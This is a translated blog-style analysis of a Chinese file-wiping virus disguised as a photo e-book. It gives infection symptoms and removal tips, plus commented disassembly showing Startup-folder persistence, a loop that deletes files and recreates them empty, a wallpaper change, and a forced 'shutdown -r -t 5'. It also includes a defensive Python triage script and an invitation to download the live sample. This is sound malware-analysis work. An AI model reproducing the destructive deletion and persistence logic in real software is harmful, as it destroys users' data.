A Quick Analysis of the “妃雅照片” (Feiya Photos) Virus

The picture above shows what the machine looks like after infection; the key parts have been hidden. If you want the high-resolution picture, click here to download the virus sample and test it yourself (run it in a virtual machine; if something goes wrong, don't blame me, hoho).

The picture above lists all the files in the virus package. Just don't run that “电子找.exe” and you'll be fine. One more note: the Pic.dll file is actually an image. Rename the extension to .jpeg and you'll find that this “dll” is the desktop background the virus sets after it fires. If all you want from testing the virus is that image, you can stop here 😉.

The picture above shows another symptom after the virus fires: every file's size becomes 0. Unfortunately, this virus deletes the original files outright rather than hiding them, so for those who got infected, the data is gone. With luck you can try EaseUS Data Recovery Wizard (易我数据恢复向导; I recall this site has a download link, search for it) or other data-recovery software, but the success rate seems very, very low. If you only want to know how your data disappeared and whether it can come back, you can stop reading here; if you want a deeper explanation, read on. One more note: if a hard-disk partition's drive letter comes after the CD-ROM drive's letter, its files are not modified. For example, if the CD-ROM is D:, files on the drives after D: will not be deleted (files on the system drive are unaffected).

The picture above is the virus's running interface; the girl is actually quite pretty. The virus does not fire while it is running, but once you click the “关” (Close) button on the interface, you're done for. If you ran it by accident, end it with Task Manager. After it has completed, running it again brings up the shutdown dialog directly. Pretty nasty either way 😎.

Although the virus prompts a shutdown, you'll find that the first time after infection it can't actually shut the computer down, heh. After infection, running the e-book just prompts a shutdown immediately, so you can't read it anymore. Depressing, right? Removing the virus is actually simple: it has only one executable, which after infection can be found in the current user's Startup folder. End it with a third-party process manager and delete it. Unfortunately, your files have gone to meet their maker and won't be coming back.

Finally, code time. First part: how does the program know whether the machine is already infected? The check is simple:

00463E60    55              push ebp                                 ; run-count check: is this the first run? Seems the first time is always the important one.
00463E61    8BEC            mov ebp,esp
00463E63    83EC 18         sub esp,0x18
00463E66    68 46144000     push <jmp.&MSVBVM60.__vbaExceptHandler>
00463EDB    C745 FC 0400000>mov dword ptr ss:[ebp-0x4],0x4
00463EE2    FF15 58104000   call dword ptr ds:[< &MSVBVM60.#598>]     ; MSVBVM60.rtcDoEvents
00463EE8    C745 FC 0500000>mov dword ptr ss:[ebp-0x4],0x5
00463EEF    C745 AC 0C27460>mov dword ptr ss:[ebp-0x54],电子照.00462>; UNICODE "WinDir"
00463EF6    C745 A4 0800000>mov dword ptr ss:[ebp-0x5C],0x8
00463EFD    8D55 A4         lea edx,dword ptr ss:[ebp-0x5C]
00463F00    8D4D B4         lea ecx,dword ptr ss:[ebp-0x4C]
00463F03    FF15 EC104000   call dword ptr ds:[< &MSVBVM60.__vbaVarDu>; MSVBVM60.__vbaVarDup
00463F09    8D45 B4         lea eax,dword ptr ss:[ebp-0x4C]
00463F0C    50              push eax
00463F0D    FF15 40104000   call dword ptr ds:[< &MSVBVM60.#667>]     ; MSVBVM60.rtcEnvironBstr
00463F13    8BD0            mov edx,eax
00463F15    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]
00463F18    FF15 00114000   call dword ptr ds:[< &MSVBVM60.__vbaStrMo>; MSVBVM60.__vbaStrMove
00463F1E    50              push eax
00463F1F    68 20274600     push 电子照.00462720                     ; UNICODE "\system32\taskmgr.exe"
00463F24    FF15 2C104000   call dword ptr ds:[< &MSVBVM60.__vbaStrCa>; MSVBVM60.__vbaStrCat
00463F2A    8BD0            mov edx,eax
00463F2C    8D4D C8         lea ecx,dword ptr ss:[ebp-0x38]
00463F2F    FF15 00114000   call dword ptr ds:[< &MSVBVM60.__vbaStrMo>; MSVBVM60.__vbaStrMove
00463F35    50              push eax
00463F36    6A 01           push 0x1
00463F38    6A FF           push -0x1
00463F3A    6A 20           push 0x20
00463F3C    FF15 B8104000   call dword ptr ds:[< &MSVBVM60.__vbaFileO>; MSVBVM60.__vbaFileOpen
00463F42    8D4D C8         lea ecx,dword ptr ss:[ebp-0x38]
00463F45    51              push ecx
00463F46    8D55 CC         lea edx,dword ptr ss:[ebp-0x34]
00463F49    52              push edx
00463F4A    6A 02           push 0x2
00463F4C    FF15 D0104000   call dword ptr ds:[< &MSVBVM60.__vbaFreeS>; MSVBVM60.__vbaFreeStrList
00463F52    83C4 0C         add esp,0xC
00463F55    8D4D B4         lea ecx,dword ptr ss:[ebp-0x4C]
00463F58    FF15 10104000   call dword ptr ds:[< &MSVBVM60.__vbaFreeV>; MSVBVM60.__vbaFreeVar
00463F5E    C745 FC 0600000>mov dword ptr ss:[ebp-0x4],0x6
00463F65    C745 AC 5027460>mov dword ptr ss:[ebp-0x54],电子照.00462>; UNICODE "C:\Pic.dll"
00463F6C    C745 A4 0800000>mov dword ptr ss:[ebp-0x5C],0x8
00463F73    8D55 A4         lea edx,dword ptr ss:[ebp-0x5C]
00463F76    8D4D B4         lea ecx,dword ptr ss:[ebp-0x4C]
00463F79    FF15 EC104000   call dword ptr ds:[< &MSVBVM60.__vbaVarDu>; MSVBVM60.__vbaVarDup
00463F7F    6A 00           push 0x0
00463F81    8D45 B4         lea eax,dword ptr ss:[ebp-0x4C]
00463F84    50              push eax
00463F85    FF15 B0104000   call dword ptr ds:[< &MSVBVM60.#645>]     ; MSVBVM60.rtcDir
00463F8B    8BD0            mov edx,eax
00463F8D    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]
00463F90    FF15 00114000   call dword ptr ds:[< &MSVBVM60.__vbaStrMo>; MSVBVM60.__vbaStrMove
00463F96    50              push eax
00463F97    68 6C274600     push 电子照.0046276C
00463F9C    FF15 6C104000   call dword ptr ds:[< &MSVBVM60.__vbaStrCm>; MSVBVM60.__vbaStrCmp
00463FA2    F7D8            neg eax
00463FA4    1BC0            sbb eax,eax
00463FA6    F7D8            neg eax
00463FA8    F7D8            neg eax
00463FAA    66:8945 84      mov word ptr ss:[ebp-0x7C],ax
00463FAE    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]
00463FB1    FF15 20114000   call dword ptr ds:[< &MSVBVM60.__vbaFreeS>; MSVBVM60.__vbaFreeStr
00463FB7    8D4D B4         lea ecx,dword ptr ss:[ebp-0x4C]
00463FBA    FF15 10104000   call dword ptr ds:[< &MSVBVM60.__vbaFreeV>; MSVBVM60.__vbaFreeVar
00463FC0    0FBF4D 84       movsx ecx,word ptr ss:[ebp-0x7C]
00463FC4    85C9            test ecx,ecx
00463FC6    0F84 8E010000   je 电子照.0046415A                       ; if Pic.dll is found, no jump: fall straight into the shutdown flow
00464020    BA 50274600     mov edx,电子照.00462750                  ; UNICODE "C:\Pic.dll"
00464025    8B4D 08         mov ecx,dword ptr ss:[ebp+0x8]
00464028    83C1 38         add ecx,0x38
0046402B    FF15 CC104000   call dword ptr ds:[< &MSVBVM60.__vbaStrCo>; MSVBVM60.__vbaStrCopy
00464031    C745 FC 0900000>mov dword ptr ss:[ebp-0x4],0x9
00464038    6A 01           push 0x1
0046403A    8B4D 08         mov ecx,dword ptr ss:[ebp+0x8]
0046403D    8B51 38         mov edx,dword ptr ds:[ecx+0x38]
00464040    52              push edx
00464041    8D45 CC         lea eax,dword ptr ss:[ebp-0x34]
00464044    50              push eax
00464045    FF15 F0104000   call dword ptr ds:[< &MSVBVM60.__vbaStrTo>; MSVBVM60.__vbaStrToAnsi
0046404B    50              push eax
0046404C    8D4D D0         lea ecx,dword ptr ss:[ebp-0x30]
0046404F    51              push ecx
00464050    FF15 E8104000   call dword ptr ds:[< &MSVBVM60.__vbaI4Var>; MSVBVM60.__vbaI4Var
00464056    50              push eax
00464057    6A 14           push 0x14
00464059    E8 5AE6FFFF     call 电子照.004626B8
0046405E    8945 90         mov dword ptr ss:[ebp-0x70],eax
00464061    FF15 30104000   call dword ptr ds:[< &MSVBVM60.__vbaSetSy>; MSVBVM60.__vbaSetSystemError
00464067    8B55 CC         mov edx,dword ptr ss:[ebp-0x34]
0046406A    52              push edx
0046406B    8B45 08         mov eax,dword ptr ss:[ebp+0x8]
0046406E    83C0 38         add eax,0x38
00464071    50              push eax
00464072    FF15 90104000   call dword ptr ds:[< &MSVBVM60.__vbaStrTo>; MSVBVM60.__vbaStrToUnicode
00464078    8B4D 08         mov ecx,dword ptr ss:[ebp+0x8]
0046407B    8B55 90         mov edx,dword ptr ss:[ebp-0x70]
0046407E    8951 34         mov dword ptr ds:[ecx+0x34],edx
00464081    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]
00464084    FF15 20114000   call dword ptr ds:[< &MSVBVM60.__vbaFreeS>; MSVBVM60.__vbaFreeStr
0046408A    C745 FC 0A00000>mov dword ptr ss:[ebp-0x4],0xA           ; call the shutdown code
00464091    C745 AC 7427460>mov dword ptr ss:[ebp-0x54],电子照.00462>; UNICODE "shutdown -r -t 5"
00464098    C745 A4 0800000>mov dword ptr ss:[ebp-0x5C],0x8
0046409F    8D55 A4         lea edx,dword ptr ss:[ebp-0x5C]
004640A2    8D4D B4         lea ecx,dword ptr ss:[ebp-0x4C]
004640A5    FF15 EC104000   call dword ptr ds:[< &MSVBVM60.__vbaVarDu>; MSVBVM60.__vbaVarDup
0046415A    C745 F0 0000000>mov dword ptr ss:[ebp-0x10],0x0          ; jumps here if the file does not exist
00464161    9B              wait
00464162    68 99414600     push 电子照.00464199
00464167    EB 26           jmp short 电子照.0046418F                ; part of the code removed here, too long
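In source terms the listing above is `If Dir("C:\Pic.dll") <> "" Then ...` (the neg/sbb sequence after `__vbaStrCmp` turns the compare result into a VB Boolean, -1 or 0), and on the true branch the program sets the wallpaper and then runs `shutdown -r -t 5`. The 0x14 pushed before the call to 004626B8 is SPI_SETDESKWALLPAPER (20); that this helper wraps SystemParametersInfo is an assumption, since the listing does not show its body. The script below is an added example, not code from the post or the sample: it runs the same marker test from the responder's side, confirms the marker is the JPEG the post describes, and lists executables in the Startup folder the post says the virus copies itself to. The Startup path in `default_startup_dir()` is the Vista-and-later location, and the tree built in `demo()` is constructed for illustration.

```python
"""Triage check for the on-disk indicators described in the post (added example)."""
import os
import tempfile
from pathlib import Path
from typing import Dict, List

JPEG_MAGIC = b"\xff\xd8\xff"   # SOI marker plus the first byte of the next marker
MARKER_NAME = "Pic.dll"        # file name used by the malware, per the post


def marker_status(system_root: str) -> Dict[str, object]:
    """Same existence test the malware performs, plus a content check.

    The malware only asks whether C:\\Pic.dll exists. A responder also wants
    to know whether it really is the JPEG wallpaper the post describes, which
    is what separates this artefact from an unrelated DLL of the same name."""
    path = Path(system_root) / MARKER_NAME
    if not path.is_file():
        return {"present": False, "is_jpeg": False, "path": str(path)}
    with path.open("rb") as fh:
        head = fh.read(len(JPEG_MAGIC))
    return {"present": True, "is_jpeg": head == JPEG_MAGIC, "path": str(path)}


def startup_executables(startup_dir: str) -> List[str]:
    """List .exe files in the Startup folder: the post says the malware copies
    itself there, so this is where manual removal begins."""
    folder = Path(startup_dir)
    if not folder.is_dir():
        return []
    return sorted(f.name for f in folder.iterdir()
                  if f.is_file() and f.suffix.lower() == ".exe")


def assess(system_root: str, startup_dir: str) -> Dict[str, object]:
    """Combine both indicators. The marker alone already means the payload
    ran, because the malware itself treats it as the 'infected' state."""
    marker = marker_status(system_root)
    exes = startup_executables(startup_dir)
    return {
        "marker": marker,
        "startup_exes": exes,
        "infected": marker["present"],
        "needs_review": bool(exes),   # a Startup .exe deserves a look, not proof by itself
    }


def default_startup_dir() -> str:
    """Current user's Startup folder on a live Vista-or-later host (assumes APPDATA is set)."""
    return os.path.join(os.environ.get("APPDATA", ""), "Microsoft", "Windows",
                        "Start Menu", "Programs", "Startup")


def demo() -> Dict[str, Dict[str, object]]:
    """Run assess() over a constructed tree: first clean, then with both artefacts planted."""
    with tempfile.TemporaryDirectory() as base:
        root = Path(base) / "root"
        startup = Path(base) / "Startup"
        root.mkdir()
        startup.mkdir()
        clean = assess(str(root), str(startup))
        # plant what the post describes: a JPEG named Pic.dll and a Startup executable
        (root / MARKER_NAME).write_bytes(b"\xff\xd8\xff\xe0\x00\x10JFIF\x00")
        (startup / "sample.exe").write_bytes(b"MZ")
        infected = assess(str(root), str(startup))
        return {"clean": clean, "infected": infected}


if __name__ == "__main__":
    # on a live host: assess(os.environ.get("SystemDrive", "C:") + "\\", default_startup_dir())
    for label, result in demo().items():
        print(label, result)
```

Point `assess()` at a mounted image or a live system drive; the marker check reads only three bytes, so it is safe to run against a suspect file.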

The dirty deeds the virus carries out while exiting, hoho:

00467925    51              push ecx
00467926    68 34294600     push 电子照.00462934
0046792B    FF15 2C104000   call dword ptr ds:[< &MSVBVM60.__vbaStrCa>; MSVBVM60.__vbaStrCat
00467931    8BD0            mov edx,eax
00467933    8D4D C8         lea ecx,dword ptr ss:[ebp-0x38]
00467936    FF15 00114000   call dword ptr ds:[< &MSVBVM60.__vbaStrMo>; MSVBVM60.__vbaStrMove
0046793C    50              push eax
0046793D    FF15 D4104000   call dword ptr ds:[< &MSVBVM60.#576>]     ; MSVBVM60.rtcFileCopy
00467943    8D55 C4         lea edx,dword ptr ss:[ebp-0x3C]          ; copy the program into the user's Startup folder
00467946    52              push edx
00467947    8D45 C8         lea eax,dword ptr ss:[ebp-0x38]
0046794A    50              push eax
0046794B    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]
 
 00467A6F    68 50274600     push 电子照.00462750                        ; UNICODE "C:\Pic.dll"
00467A74    8B55 CC         mov edx,dword ptr ss:[ebp-0x34]
00467A77    52              push edx
00467A78    68 C0294600     push 电子照.004629C0                        ; UNICODE "\Pic.dll"
00467A7D    FF15 2C104000   call dword ptr ds:[< &MSVBVM60.__vbaStrCa>; MSVBVM60.__vbaStrCat
00467A83    8BD0            mov edx,eax
00467A85    8D4D C8         lea ecx,dword ptr ss:[ebp-0x38]
00467A88    FF15 00114000   call dword ptr ds:[< &MSVBVM60.__vbaStrMo>; MSVBVM60.__vbaStrMove
00467A8E    50              push eax
00467A8F    FF15 D4104000   call dword ptr ds:[< &MSVBVM60.#576>]     ; MSVBVM60.rtcFileCopy
00467A95    8D45 C8         lea eax,dword ptr ss:[ebp-0x38]          ; copy Pic.dll to the root of the system drive
00467A98    50              push eax
00467A99    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]
 
00464762    6A 01           push 0x1
00464764    68 C8274600     push 电子照.004627C8                        ; GetFolder: get the folder
00464769    8D95 3CFFFFFF   lea edx,dword ptr ss:[ebp-0xC4]
0046476F    52              push edx
00464770    8D85 CCFEFFFF   lea eax,dword ptr ss:[ebp-0x134]
00464776    50              push eax
00464777    FF15 F4104000   call dword ptr ds:[< &MSVBVM60.__vbaVarLa>; MSVBVM60.__vbaVarLateMemCallLd
0046477D    83C4 20         add esp,0x20
00464780    50              push eax
00464781    8D4D 8C         lea ecx,dword ptr ss:[ebp-0x74]
00464784    51              push ecx
00464785    FF15 E4104000   call dword ptr ds:[< &MSVBVM60.__vbaVarSe>; MSVBVM60.__vbaVarSetVar
0046478B    C745 FC 0400000>mov dword ptr ss:[ebp-0x4],0x4
00464792    6A 00           push 0x0
00464794    68 DC274600     push 电子照.004627DC                        ; Files: get the files
00464799    8D55 8C         lea edx,dword ptr ss:[ebp-0x74]
0046479C    52              push edx
0046479D    8D85 CCFEFFFF   lea eax,dword ptr ss:[ebp-0x134]
 
00464829    FF15 70104000   call dword ptr ds:[< &MSVBVM60.#529>]                 ; MSVBVM60.rtcKillFiles
0046482F    C745 FC 0800000>mov dword ptr ss:[ebp-0x4],0x8
00464836    8D45 BC         lea eax,dword ptr ss:[ebp-0x44]
00464839    8985 B4FEFFFF   mov dword ptr ss:[ebp-0x14C],eax
0046483F    C785 ACFEFFFF 0>mov dword ptr ss:[ebp-0x154],0x4008
00464849    C785 A4FEFFFF F>mov dword ptr ss:[ebp-0x15C],-0x1
 
 
00464690    55              push ebp                                 ; file and folder deletion function
00464691    8BEC            mov ebp,esp
00464693    83EC 18         sub esp,0x18
00464696    68 46144000     push <jmp.&MSVBVM60.__vbaExceptHandler>
0046469B    64:A1 00000000  mov eax,dword ptr fs:[0]
004646A1    50              push eax
004646A2    64:8925 0000000>mov dword ptr fs:[0],esp
004646A9    B8 A4040000     mov eax,0x4A4
004646AE    E8 8DCDF9FF     call <jmp.&MSVBVM60.__vbaChkstk>
004646B3    53              push ebx
004646B4    56              push esi
004646B5    57              push edi
004646B6    8965 E8         mov dword ptr ss:[ebp-0x18],esp
004646B9    C745 EC A011400>mov dword ptr ss:[ebp-0x14],电子照.004011>; /
004646C0    C745 F0 0000000>mov dword ptr ss:[ebp-0x10],0x0
004646C7    C745 F4 0000000>mov dword ptr ss:[ebp-0xC],0x0
004646CE    8B45 08         mov eax,dword ptr ss:[ebp+0x8]
004646D1    8B08            mov ecx,dword ptr ds:[eax]
004646D3    8B55 08         mov edx,dword ptr ss:[ebp+0x8]
004646D6    52              push edx
004646D7    FF51 04         call dword ptr ds:[ecx+0x4]
004646DA    C745 FC 0100000>mov dword ptr ss:[ebp-0x4],0x1
004646E1    8B45 10         mov eax,dword ptr ss:[ebp+0x10]
004646E4    C700 00000000   mov dword ptr ds:[eax],0x0
004646EA    C745 FC 0200000>mov dword ptr ss:[ebp-0x4],0x2
004646F1    6A 00           push 0x0
004646F3    68 30284600     push 电子照.00462830                      ; (Initial CPU selection)
004646F8    8D8D CCFEFFFF   lea ecx,dword ptr ss:[ebp-0x134]
004646FE    51              push ecx
004646FF    FF15 A0104000   call dword ptr ds:[< &MSVBVM60.#716>]   ; MSVBVM60.rtcCreateObject2
00464705    8D95 CCFEFFFF   lea edx,dword ptr ss:[ebp-0x134]
0046470B    52              push edx
0046470C    8D85 3CFFFFFF   lea eax,dword ptr ss:[ebp-0xC4]
00464712    50              push eax
00464713    FF15 E4104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarSetVar
00464719    C745 FC 0300000>mov dword ptr ss:[ebp-0x4],0x3
00464720    8B4D 0C         mov ecx,dword ptr ss:[ebp+0xC]
00464723    898D B4FEFFFF   mov dword ptr ss:[ebp-0x14C],ecx
00464729    C785 ACFEFFFF 0>mov dword ptr ss:[ebp-0x154],0x4008
00464733    B8 10000000     mov eax,0x10
00464738    E8 03CDF9FF     call <jmp.&MSVBVM60.__vbaChkstk>
0046473D    8BD4            mov edx,esp
0046473F    8B85 ACFEFFFF   mov eax,dword ptr ss:[ebp-0x154]
00464745    8902            mov dword ptr ds:[edx],eax
00464747    8B8D B0FEFFFF   mov ecx,dword ptr ss:[ebp-0x150]
0046474D    894A 04         mov dword ptr ds:[edx+0x4],ecx
00464750    8B85 B4FEFFFF   mov eax,dword ptr ss:[ebp-0x14C]
00464756    8942 08         mov dword ptr ds:[edx+0x8],eax
00464759    8B8D B8FEFFFF   mov ecx,dword ptr ss:[ebp-0x148]
0046475F    894A 0C         mov dword ptr ds:[edx+0xC],ecx
00464762    6A 01           push 0x1
00464764    68 C8274600     push 电子照.004627C8                      ; GetFolder: get the folder
00464769    8D95 3CFFFFFF   lea edx,dword ptr ss:[ebp-0xC4]
0046476F    52              push edx
00464770    8D85 CCFEFFFF   lea eax,dword ptr ss:[ebp-0x134]
00464776    50              push eax
00464777    FF15 F4104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarLateMemCallLd
0046477D    83C4 20         add esp,0x20
00464780    50              push eax
00464781    8D4D 8C         lea ecx,dword ptr ss:[ebp-0x74]
00464784    51              push ecx
00464785    FF15 E4104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarSetVar
0046478B    C745 FC 0400000>mov dword ptr ss:[ebp-0x4],0x4
00464792    6A 00           push 0x0
00464794    68 DC274600     push 电子照.004627DC                      ; Files: get the files
00464799    8D55 8C         lea edx,dword ptr ss:[ebp-0x74]
0046479C    52              push edx
0046479D    8D85 CCFEFFFF   lea eax,dword ptr ss:[ebp-0x134]
004647A3    50              push eax
004647A4    FF15 F4104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarLateMemCallLd
004647AA    83C4 10         add esp,0x10
004647AD    8BD0            mov edx,eax
004647AF    8D8D 20FEFFFF   lea ecx,dword ptr ss:[ebp-0x1E0]
004647B5    FF15 60104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarZero
004647BB    8D8D 20FEFFFF   lea ecx,dword ptr ss:[ebp-0x1E0]
004647C1    51              push ecx
004647C2    8D55 9C         lea edx,dword ptr ss:[ebp-0x64]
004647C5    52              push edx
004647C6    8D85 88FEFFFF   lea eax,dword ptr ss:[ebp-0x178]
004647CC    50              push eax
004647CD    8D8D 60FCFFFF   lea ecx,dword ptr ss:[ebp-0x3A0]
004647D3    51              push ecx
004647D4    8D95 5CFCFFFF   lea edx,dword ptr ss:[ebp-0x3A4]
004647DA    52              push edx
004647DB    8D85 BCFCFFFF   lea eax,dword ptr ss:[ebp-0x344]
004647E1    50              push eax
004647E2    FF15 04114000   call dword ptr ds:[< &MSVBVM60.__vbaFor>; MSVBVM60.__vbaForEachVar
004647E8    8985 94FBFFFF   mov dword ptr ss:[ebp-0x46C],eax
004647EE    E9 47010000     jmp 电子照.0046493A
004647F3    C745 FC 0500000>mov dword ptr ss:[ebp-0x4],0x5         ; loop that deletes the files
004647FA    6A FF           push -0x1
004647FC    FF15 48104000   call dword ptr ds:[< &MSVBVM60.__vbaOnE>; MSVBVM60.__vbaOnError
00464802    C745 FC 0600000>mov dword ptr ss:[ebp-0x4],0x6
00464809    8D4D 9C         lea ecx,dword ptr ss:[ebp-0x64]
0046480C    51              push ecx
0046480D    FF15 08114000   call dword ptr ds:[< &MSVBVM60.__vbaStr>; MSVBVM60.__vbaStrVarCopy
00464813    8BD0            mov edx,eax
00464815    8D4D BC         lea ecx,dword ptr ss:[ebp-0x44]
00464818    FF15 00114000   call dword ptr ds:[< &MSVBVM60.__vbaStr>; MSVBVM60.__vbaStrMove
0046481E    C745 FC 0700000>mov dword ptr ss:[ebp-0x4],0x7
00464825    8D55 9C         lea edx,dword ptr ss:[ebp-0x64]
00464828    52              push edx
00464829    FF15 70104000   call dword ptr ds:[< &MSVBVM60.#529>]   ; MSVBVM60.rtcKillFiles
0046482F    C745 FC 0800000>mov dword ptr ss:[ebp-0x4],0x8         ; deletes the file outright via rtcKillFiles, brutal~
00464836    8D45 BC         lea eax,dword ptr ss:[ebp-0x44]
00464839    8985 B4FEFFFF   mov dword ptr ss:[ebp-0x14C],eax
0046483F    C785 ACFEFFFF 0>mov dword ptr ss:[ebp-0x154],0x4008
00464849    C785 A4FEFFFF F>mov dword ptr ss:[ebp-0x15C],-0x1
00464853    C785 9CFEFFFF 0>mov dword ptr ss:[ebp-0x164],0xB
0046485D    6A 00           push 0x0
0046485F    68 6C284600     push 电子照.0046286C                      ; Scripting.FileSystemObject
00464864    8D8D CCFEFFFF   lea ecx,dword ptr ss:[ebp-0x134]
0046486A    51              push ecx
0046486B    FF15 A0104000   call dword ptr ds:[< &MSVBVM60.#716>]   ; MSVBVM60.rtcCreateObject2
00464871    B8 10000000     mov eax,0x10
00464876    E8 C5CBF9FF     call <jmp.&MSVBVM60.__vbaChkstk>
0046487B    8BD4            mov edx,esp
0046487D    8B85 ACFEFFFF   mov eax,dword ptr ss:[ebp-0x154]
00464883    8902            mov dword ptr ds:[edx],eax
00464885    8B8D B0FEFFFF   mov ecx,dword ptr ss:[ebp-0x150]
0046488B    894A 04         mov dword ptr ds:[edx+0x4],ecx
0046488E    8B85 B4FEFFFF   mov eax,dword ptr ss:[ebp-0x14C]
00464894    8942 08         mov dword ptr ds:[edx+0x8],eax
00464897    8B8D B8FEFFFF   mov ecx,dword ptr ss:[ebp-0x148]
0046489D    894A 0C         mov dword ptr ds:[edx+0xC],ecx
004648A0    B8 10000000     mov eax,0x10
004648A5    E8 96CBF9FF     call <jmp.&MSVBVM60.__vbaChkstk>
004648AA    8BD4            mov edx,esp
004648AC    8B85 9CFEFFFF   mov eax,dword ptr ss:[ebp-0x164]
004648B2    8902            mov dword ptr ds:[edx],eax
004648B4    8B8D A0FEFFFF   mov ecx,dword ptr ss:[ebp-0x160]
004648BA    894A 04         mov dword ptr ds:[edx+0x4],ecx
004648BD    8B85 A4FEFFFF   mov eax,dword ptr ss:[ebp-0x15C]
004648C3    8942 08         mov dword ptr ds:[edx+0x8],eax
004648C6    8B8D A8FEFFFF   mov ecx,dword ptr ss:[ebp-0x158]
004648CC    894A 0C         mov dword ptr ds:[edx+0xC],ecx
004648CF    6A 02           push 0x2
004648D1    68 A4284600     push 电子照.004628A4                      ; CreateTextFile
004648D6    8D95 CCFEFFFF   lea edx,dword ptr ss:[ebp-0x134]          ; re-creates the deleted file (empty)
004648DC    52              push edx
004648DD    8D85 BCFEFFFF   lea eax,dword ptr ss:[ebp-0x144]
004648E3    50              push eax
004648E4    FF15 F4104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarLateMemCallLd
004648EA    83C4 30         add esp,0x30
004648ED    50              push eax
004648EE    8D8D 0CFFFFFF   lea ecx,dword ptr ss:[ebp-0xF4]
004648F4    51              push ecx
004648F5    FF15 E4104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarSetVar
004648FB    8D8D CCFEFFFF   lea ecx,dword ptr ss:[ebp-0x134]
00464901    FF15 10104000   call dword ptr ds:[< &MSVBVM60.__vbaFre>; MSVBVM60.__vbaFreeVar
00464907    C745 FC 0900000>mov dword ptr ss:[ebp-0x4],0x9
0046490E    8D55 9C         lea edx,dword ptr ss:[ebp-0x64]
00464911    52              push edx
00464912    8D85 88FEFFFF   lea eax,dword ptr ss:[ebp-0x178]
00464918    50              push eax
00464919    8D8D 60FCFFFF   lea ecx,dword ptr ss:[ebp-0x3A0]
0046491F    51              push ecx
00464920    8D95 5CFCFFFF   lea edx,dword ptr ss:[ebp-0x3A4]
00464926    52              push edx
00464927    8D85 BCFCFFFF   lea eax,dword ptr ss:[ebp-0x344]
0046492D    50              push eax
0046492E    FF15 20104000   call dword ptr ds:[< &MSVBVM60.__vbaNex>; MSVBVM60.__vbaNextEachVar
00464934    8985 94FBFFFF   mov dword ptr ss:[ebp-0x46C],eax
0046493A    83BD 94FBFFFF 0>cmp dword ptr ss:[ebp-0x46C],0x0
00464941  ^ 0F85 ACFEFFFF   jnz 电子照.004647F3                       ; back to the top of the file-deletion loop
 
 
00467C90    8D4D B0         lea ecx,dword ptr ss:[ebp-0x50]
00467C93    FF15 10104000   call dword ptr ds:[< &MSVBVM60.__vbaFreeV>; MSVBVM60.__vbaFreeVar
00467C99    C745 FC 0C00000>mov dword ptr ss:[ebp-0x4],0xC
00467CA0    BA 50274600     mov edx,电子照.00462750                     ; UNICODE "C:\Pic.dll"
00467CA5    8B4D 08         mov ecx,dword ptr ss:[ebp+0x8]
00467CA8    83C1 38         add ecx,0x38
00467CAB    FF15 CC104000   call dword ptr ds:[< &MSVBVM60.__vbaStrCo>; MSVBVM60.__vbaStrCopy
00467CB1    C745 FC 0D00000>mov dword ptr ss:[ebp-0x4],0xD
00467CB8    6A 01           push 0x1
00467CBA    8B45 08         mov eax,dword ptr ss:[ebp+0x8]
00467CBD    8B48 38         mov ecx,dword ptr ds:[eax+0x38]
00467CC0    51              push ecx
00467CC1    8D55 CC         lea edx,dword ptr ss:[ebp-0x34]
00467CC4    52              push edx
00467CC5    FF15 F0104000   call dword ptr ds:[< &MSVBVM60.__vbaStrTo>; MSVBVM60.__vbaStrToAnsi
00467CCB    50              push eax
00467CCC    8D45 D0         lea eax,dword ptr ss:[ebp-0x30]
00467CCF    50              push eax
00467CD0    FF15 E8104000   call dword ptr ds:[< &MSVBVM60.__vbaI4Var>; MSVBVM60.__vbaI4Var
00467CD6    50              push eax
00467CD7    6A 14           push 0x14
00467CD9    E8 DAA9FFFF     call 电子照.004626B8                        ; set the desktop background image
00467CDE    8985 6CFFFFFF   mov dword ptr ss:[ebp-0x94],eax
00467CE4    FF15 30104000   call dword ptr ds:[< &MSVBVM60.__vbaSetSy>; MSVBVM60.__vbaSetSystemError
00467CEA    8B4D CC         mov ecx,dword ptr ss:[ebp-0x34]
00467CED    51              push ecx
00467CEE    8B55 08         mov edx,dword ptr ss:[ebp+0x8]
00467CF1    83C2 38         add edx,0x38
00467CF4    52              push edx
00467CF5    FF15 90104000   call dword ptr ds:[< &MSVBVM60.__vbaStrTo>; MSVBVM60.__vbaStrToUnicode
00467CFB    8B45 08         mov eax,dword ptr ss:[ebp+0x8]
00467CFE    8B8D 6CFFFFFF   mov ecx,dword ptr ss:[ebp-0x94]
00467D04    8948 34         mov dword ptr ds:[eax+0x34],ecx
00467D07    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]
00467D0A    FF15 20114000   call dword ptr ds:[< &MSVBVM60.__vbaFreeS>; MSVBVM60.__vbaFreeStr
00467D10    C745 FC 0E00000>mov dword ptr ss:[ebp-0x4],0xE
00467D17    C745 88 7427460>mov dword ptr ss:[ebp-0x78],电子照.00462774 ; UNICODE "shutdown -r -t 5"
00467D1E    C745 80 0800000>mov dword ptr ss:[ebp-0x80],0x8          ; shutdown command
00467D25    8D55 80         lea edx,dword ptr ss:[ebp-0x80]
00467D28    8D4D B0         lea ecx,dword ptr ss:[ebp-0x50]
00467D2B    FF15 EC104000   call dword ptr ds:[< &MSVBVM60.__vbaVarDu>; MSVBVM60.__vbaVarDup
00467D31    6A 02           push 0x2
00467D33    8D55 B0         lea edx,dword ptr ss:[ebp-0x50]
00467D36    52              push edx
00467D37    FF15 80104000   call dword ptr ds:[< &MSVBVM60.#600>]     ; MSVBVM60.rtcShell
00467D3D    DD9D 64FFFFFF   fstp qword ptr ss:[ebp-0x9C]             ; shut down the computer
00467D43    8D4D B0         lea ecx,dword ptr ss:[ebp-0x50]
00467D46    FF15 10104000   call dword ptr ds:[< &MSVBVM60.__vbaFreeV>; MSVBVM60.__vbaFreeVar
